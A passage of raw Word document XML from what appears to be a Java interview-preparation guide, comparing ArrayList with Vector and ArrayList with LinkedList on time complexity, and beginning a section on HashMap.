          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (introduced in Java 1.2), and is the recommended choice for most use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC41BB"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12D29727"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introduced in Java 1.0) and is considered somewhat outdated. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>old collection classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it is still part of the Java API for backward compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD5C2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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C52BB9"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2B0CBB"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hav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s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94486F"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5ABB6C0"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 methods lik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to provide more control over the internal array and memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E90DC"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235808BD"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353F2B6"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non-thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments where you need fast access and modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692DE7F"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B6E98B1"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environments where synchronization is required. However, due to the better alternatives (like CopyOnWriteArrayList or Collections.synchronizedList()), it is less commonly used now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE46DA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358"/>
        <w:gridCol w:w="4268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="086DFDDF" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524F9814"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8A0D22"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26B156"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ector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="54F59B70" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB10E6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69818C2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ynchronized (not thread-safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29EBC51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ized (thread-safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="2DB40866" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D58F07A"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Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="080E5B8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50% of the current size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DA106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100% (doubling the capacity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="0C69318F" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB307B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53D0A4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environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71C0CC4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F26C9C" w:rsidRPr="00CE4B95" w14:paraId="0482FED5" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A9F014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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0101FCA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the modern Collections framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="444775E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older API, Java 1.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="3C1786FE" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3076DD23"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B0E648D"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apacity() or trimToSize()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52345115"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capacity() and trimToSize() methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="5184D529" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DA29B7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233BC6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for most cases in modern applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65CF01C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legacy code, thread-safe environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FF26ED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29426D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rrayList example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A311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arrayList = new ArrayList&lt;&gt;(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DF433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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A230BB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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D857126" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3352C0CE"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Vector example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB7E60"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lt;Integer&gt; vector = new Vector&lt;&gt;(10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEBCCB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1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401875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2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C8E6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CF5EFB" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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a non-synchronized, dynamically resizing list and performance is a priority in single-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107B960F" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Use Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> only if you specifically need synchronization (in a multi-threaded environment) and are working with legacy systems or APIs that still use Vector. For modern multi-threaded list handling, consider alternatives like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CopyOnWriteArray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llections.synchronizedList()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EEE2B6" w14:textId="3B98742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07" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74898CD6" w14:textId="77777777" w:rsidR="00132A30" w:rsidRPr="00CE4B95" w:rsidRDefault="00132A30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc197867378"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Best time complexity of Arraylist and Linkedlist? Which is better?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w14:paraId="5C24C17E" w14:textId="0AA2DF69" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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 ArrayList vs LinkedList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091FF47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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>best-case time complexities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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1879"/>
        <w:gridCol w:w="1894"/>
      </w:tblGrid>
      <w:tr w:rsidR="000E4764" w:rsidRPr="00CE4B95" w14:paraId="1F544724" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29F3209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6F366878"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52AA1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0E4764" w:rsidRPr="00CE4B95" w14:paraId="426C43E7" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3A038B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FA6F908"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73ACAC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316182B3" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E75BC0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end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BB1A7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5F3B48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A19228B" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04DFD6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beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A41800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DD832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16721213" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="414F12FA"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middle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1197CA8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074252E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2CB0518B" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="312C2D4F"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an element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D2F15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65814E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6FB2BBD5" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033509C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end</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24C5E22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5682B6F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8492BBC" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36DCD5D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beginning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51053FF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1731D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302688A0" w14:textId="77777777" w:rsidTr="00CD10FC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A1FB51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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D7345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7A4B271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bl>
    <w:p w14:paraId="515426AF"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245CE92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 (by index)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6883DD"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Since ArrayList uses an array, it allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direct index-based access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This operation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which is constant time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139765D7"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LinkedList, to access an element, you need to traverse the list from the head to the specific index.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size of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322AB78E"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End</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0A33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at the end of an ArrayList is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sometimes it can tak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n the internal array is full and needs to be resized (which involves copying all elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13677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at the end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you can directly add the element at the end, without needing to shift other elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49767B8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Beginning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616CF42E"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f you insert or delete an element at the beginning of an ArrayList, all other elements have to be shifted.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BE06D44"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nserting or deleting an element at the beginning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it involves just adjusting the pointers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC9A66"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Middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C2CF2"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or deleting in the middle of an ArrayList requires shifting elements after the insertion or deletion point.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C651D5A"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or deleting in the middle of a LinkedList requires traversal to find the position (which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and then adjusting the pointers, which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3E23CC94"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6C1D28"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hav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complexity for searching an element because both require linear traversal to find the element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A78E1B"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ich is Better?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B035DF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choi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epends on your specific use case and the types of operations you need to perform most often:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B391430"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 when</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C863A8"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is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4054B"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frequently access elements by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686BB8E1"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ions and deletions are mostly happening at the end of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A07725"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overhead is a concern (since ArrayList uses contiguous memory and is more cache-friendly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32076D08"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 when</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE9449"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BBA032"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requent index-based access and can afford to traverse the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD5250"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manage memory dynamically without worrying about resizing or shifting elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BB116"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FD573BC"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ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1) for accessing, inserting/removing at the end, and generally better performance for index-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5A581"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LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: O(1) for insertions/removals at the ends, but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access and searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AEDC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random access performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is critical,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typically better. If </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at arbitrary positions are more common, the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might be a better choice despite the higher memory usage due to the pointers in each node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8AA0A" w14:textId="6B15254E"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08" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4C6B6" w14:textId="77777777" w:rsidR="008F441B" w:rsidRPr="00CE4B95" w:rsidRDefault="008F441B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc197867379"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="22A80963" w14:textId="149F7B55" w:rsidR="008F441B" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap&lt;K, V&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>part of java.util package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
